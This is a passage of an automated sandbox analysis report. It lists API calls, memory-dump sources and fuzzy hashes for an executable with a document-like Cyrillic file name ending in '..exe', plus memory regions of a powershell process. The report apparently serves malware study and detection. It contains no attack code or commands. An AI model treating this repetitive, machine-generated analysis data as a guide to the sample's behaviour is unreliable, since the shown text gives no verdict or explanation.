                                                            • Opcode Fuzzy Hash: d4fc8010274739b422e9c4851511b62dbacfb07d9cf0bff86c6d3941990f78f8
                                                            • Instruction Fuzzy Hash: 8EF09611A00A1156DF31B6584C85A7776BCDB54364B10903BE602BB2C0E3F86C81CFF9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-297319885
                                                            • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                            • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                            • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00402D9D
                                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00402DE6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                            • Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
                                                            • Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
                                                            • Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00405152
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004051A3
                                                              • Part of subcall function 00404160: SendMessageW.USER32(000103E6,00000000,00000000,00000000), ref: 00404172
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                            • Instruction ID: 3a757cf3c9e7612e230a46be1b13aa2d047f9f757cddf2eb8b5381add8f22129
                                                            • Opcode Fuzzy Hash: 340d3c0ef1b6191d39bf660b6c525c67a0e16f797af015efc8e2bb8f4ca6604a
                                                            • Instruction Fuzzy Hash: 43017C71A00609ABEB218F51ED84B9B3B2AEB84750F504037F6047D1E0C77A8C929E2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,004037DC,004035F2,?), ref: 0040381E
                                                            • GlobalFree.KERNEL32(?), ref: 00403825
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403804
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: Free$GlobalLibrary
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 1100898210-297319885
                                                            • Opcode ID: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                            • Instruction ID: c0ef5988400ca03a2919d730679f4c8cdc7c60ab336a91eb80d60266565c467d
                                                            • Opcode Fuzzy Hash: da2816148213eaf2ca9be615ca64e0b95c5ba1132a9b108e3e9160e8cd70995f
                                                            • Instruction Fuzzy Hash: D2E0C2735015309BC6212F45ED0871EB7ACAF59B22F0580BAF8907B26087781C428FD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405A56
                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe,80000000,00000003,?,?,"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe",00403536,?), ref: 00405A66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrlen
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 2709904686-2743851969
                                                            • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction ID: 94586c4fc4af0aa81d4ff890ae3cf2b30e5be6a9e55ec7b9bf63862dfaa4d6e2
                                                            • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                            • Instruction Fuzzy Hash: 0ED05EB2411920AAC312A714DD44DAF73ACEF123007464466F441A6161D7785D818AAD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB2
                                                            • CharNextA.USER32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC3
                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1318365038.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1318349084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318393785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318411986.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1318840208.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                            • Instruction ID: 8848f7d8d782bbf7f3224fb8fd0babd0dea9e1ab2e05ea72f699364142252924
                                                            • Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
                                                            • Instruction Fuzzy Hash: 72F0C231100914EFCB029FA5CD4099FBFB8EF06350B2540A9E840F7311D674FE019BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b62cc7986c26653cf90875833852f225f49c1687cf4d623b474ffac3272ea39
                                                            • Instruction ID: 86d26ad6854dbce8b5e82619509f73ab1c985db20f4e4384968a6eeb06ffb467
                                                            • Opcode Fuzzy Hash: 8b62cc7986c26653cf90875833852f225f49c1687cf4d623b474ffac3272ea39
                                                            • Instruction Fuzzy Hash: 5DB15C74E00209CFDB10CFA9E8857AEBBF2AF88754F14C12DD816A7254EB74A941CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1648397955.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_4c60000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45cd138a8482252349180708a8df4b322b617966da2c05de134abb47bbdaf71c
                                                            • Instruction ID: 29333c95a500bbcba17c695af97d1df6bf90b4cadecf9433eade30d04edd1dde
                                                            • Opcode Fuzzy Hash: 45cd138a8482252349180708a8df4b322b617966da2c05de134abb47bbdaf71c
                                                            • Instruction Fuzzy Hash: A2B15D71E00209DFDB10CFA9E89179DBBF2AF88714F14C52DD816E7294EB74A941CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: eebac595be1cf6156f42afbd5a792e742e82d0fcfb5e17e008cced2ff92edead
                                                            • Instruction ID: b0b78dcd6407014e3f09e3d3090f976b763838624ae87456780b6e38967af7f7
                                                            • Opcode Fuzzy Hash: eebac595be1cf6156f42afbd5a792e742e82d0fcfb5e17e008cced2ff92edead
                                                            • Instruction Fuzzy Hash: DF7282B4B00215DFD714DBA8C491BAEBBB2AF89300F24C4A9E6159F352DB72DD41CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: ae2e1bc7450d377f381ea3d9281c3eb1ad8a0ccd6788b07391878a755de3b64c
                                                            • Instruction ID: 56703fe439a6a706139f424faf220e11b676bf6daf4816461d602114cae2d5ab
                                                            • Opcode Fuzzy Hash: ae2e1bc7450d377f381ea3d9281c3eb1ad8a0ccd6788b07391878a755de3b64c
                                                            • Instruction Fuzzy Hash: CA5285B4B00215DFD714DB98C891B9EB7B2EF89300F14C1A9E6159F352DB72DD818B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: e2480392c6d67eff65a60d336c889038bbdb069dd2d561f1107f8df0ebad9c5f
                                                            • Instruction ID: d46e10e3a47feee27d448bf79bfc0ca693e24e928c63d7d4d6dab9e0113270a1
                                                            • Opcode Fuzzy Hash: e2480392c6d67eff65a60d336c889038bbdb069dd2d561f1107f8df0ebad9c5f
                                                            • Instruction Fuzzy Hash: EF3281B4B00215DFD714DB98C881B9ABBB2EF89304F14C1A9E6199F352DB72DD818F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: 18f7925cd424cf872deb1d7b06f08a3918eab06e21e924f1a4b73317658bdefe
                                                            • Instruction ID: 0c26e132fc96d5ac3134471180849a2ea3b8ac564f8bada05115b7b9c26c9a26
                                                            • Opcode Fuzzy Hash: 18f7925cd424cf872deb1d7b06f08a3918eab06e21e924f1a4b73317658bdefe
                                                            • Instruction Fuzzy Hash: 683283B5B00214DFD750DB58C950BE9B7B2EF89344F1081A9EA095F391DBB2ED828F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: 11d052ad2bffa193386113b69583d5418f6a994c9b0545431c57ebc84185b23e
                                                            • Instruction ID: d712e82d79bb211d9f18ef16686b02be31ad184ce9164b8c36cf550acff6787a
                                                            • Opcode Fuzzy Hash: 11d052ad2bffa193386113b69583d5418f6a994c9b0545431c57ebc84185b23e
                                                            • Instruction Fuzzy Hash: 5B12A5B0B002149FD754DB58C950BDEB7B2EF89344F1084A9E6095F391DBB6ED828F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: 8f986eac0be10a67d62c86f7bb2b55a5d438c05de5c4988e48a1ca6e58b16ed2
                                                            • Instruction ID: 8ec14a401b11a9a6d8eb29398254831ed32581e8f6c6ba6f95a8eb88efb24d77
                                                            • Opcode Fuzzy Hash: 8f986eac0be10a67d62c86f7bb2b55a5d438c05de5c4988e48a1ca6e58b16ed2
                                                            • Instruction Fuzzy Hash: 2B0294B47002149FD750DB58C950BDEB7B2EF89344F1081A9EA095F391DBB2ED828F91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: a073afd0cf7a89c4372283c927ba42e631f34141c6cc99beee934f4cfcdf8b1a
                                                            • Instruction ID: 96a32f996ea0de2e4d26653e6708e2eba130b1544f0dfeb5b1697ae09f05d1f6
                                                            • Opcode Fuzzy Hash: a073afd0cf7a89c4372283c927ba42e631f34141c6cc99beee934f4cfcdf8b1a
                                                            • Instruction Fuzzy Hash: 41E190B0B00205AFDB14DB98C441B9EBBB2AFCD344F24C429E6116F395CB76DC828B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k$-k
                                                            • API String ID: 0-766683181
                                                            • Opcode ID: ded873267c5f10b86a1fcb1f919ead1a2bcd5282835b4c79093b020a3b01b241
                                                            • Instruction ID: d19352fa400459b222b2d7b1ddff937cfdaca4b2be27ff3e5a8156ecc3ad78fd
                                                            • Opcode Fuzzy Hash: ded873267c5f10b86a1fcb1f919ead1a2bcd5282835b4c79093b020a3b01b241
                                                            • Instruction Fuzzy Hash: 54C181B0A00205EFDB14DB98C580B9EBBB2AFCD344F14C569E6156F356CB75EC828B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: x.k
                                                            • API String ID: 0-3814145804
                                                            • Opcode ID: 93a56628aa2b32f62d2121d8d3b2e27c7148c549d1ac73ba5bf3442251fbc761
                                                            • Instruction ID: bdcbce9a5757f2d0af78f16ce7a22f7d7c703b8bc3455e65f9a7bb58bc262766
                                                            • Opcode Fuzzy Hash: 93a56628aa2b32f62d2121d8d3b2e27c7148c549d1ac73ba5bf3442251fbc761
                                                            • Instruction Fuzzy Hash: 39F180B4A00219DFDB60DBA8C944BD9B7B2BF89304F1085A5E6096F342DB75ED81CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ea8f67945343ba5ace3876a922034c591194bfc5877b7da1c572b3f4872f52f
                                                            • Instruction ID: 1fef225c24040783550b609943aff309318a25aa376b46419d4d0f1e62357530
                                                            • Opcode Fuzzy Hash: 9ea8f67945343ba5ace3876a922034c591194bfc5877b7da1c572b3f4872f52f
                                                            • Instruction Fuzzy Hash: 2A829FB4B01205DFDB14DB99C490BAEBBB2AF89300F14C06AEA159F355DB72DD42CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.1653927709.0000000007AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7af0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 760e6fa42a0367386fbeeba5782cdd86a70ef09439d6653d36a0a29ed9f05791
                                                            • Instruction ID: f20c6398a724cd21f6f94f1d8c490d1b596d48a1a798a152e451dcb0a8487cb6
